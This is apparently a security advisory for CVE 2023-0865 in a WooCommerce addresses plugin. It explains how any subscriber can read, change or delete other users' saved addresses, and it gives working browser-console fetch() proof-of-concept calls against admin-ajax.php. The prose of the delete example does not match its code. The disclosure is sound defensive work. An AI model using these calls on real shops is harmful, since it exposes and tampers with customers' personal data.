WooCommerce Multiple Customer Addresses & Shipping < 21.7 – Arbitrary Address Creation/Deletion/Access/Update via IDOR | CVE 2023-0865

Description

The plugin does not ensure that the address to add/update/retrieve/delete and duplicate belong to the user making the request, or is from a high privilege users, allowing any authenticated users, such as subscriber to add/update/duplicate/delete as well as retrieve addresses of other users.

Proof of Concept

Run the below commands in the developer console of the web browser while being on the blog as subscriber user (note: the address manipulated are those added via the plugin, not WC)

To retrieve the first address of the user with ID 1750

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wcmca_get_address_by_id&address_id=0&user_id=1750',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

Other possible values for address_id: last_used_billing, last_used_shipping, checkout_data.

To delete the address with ID 1 of the user with ID 1750 (to be executed on the Edit Address page when logged as a subscriber, e.g http://example.com/my-account/edit-address/)

fetch("/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'action=wcmca_delete_address&wcmca_delete_id=0&wcmca_user_id=1&wcmca_security_token=' + wcmca_address_form['security_token'],
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));

It is also possible to add/update an address of an arbitrary user via the wcmca_save_new_address AJAX action.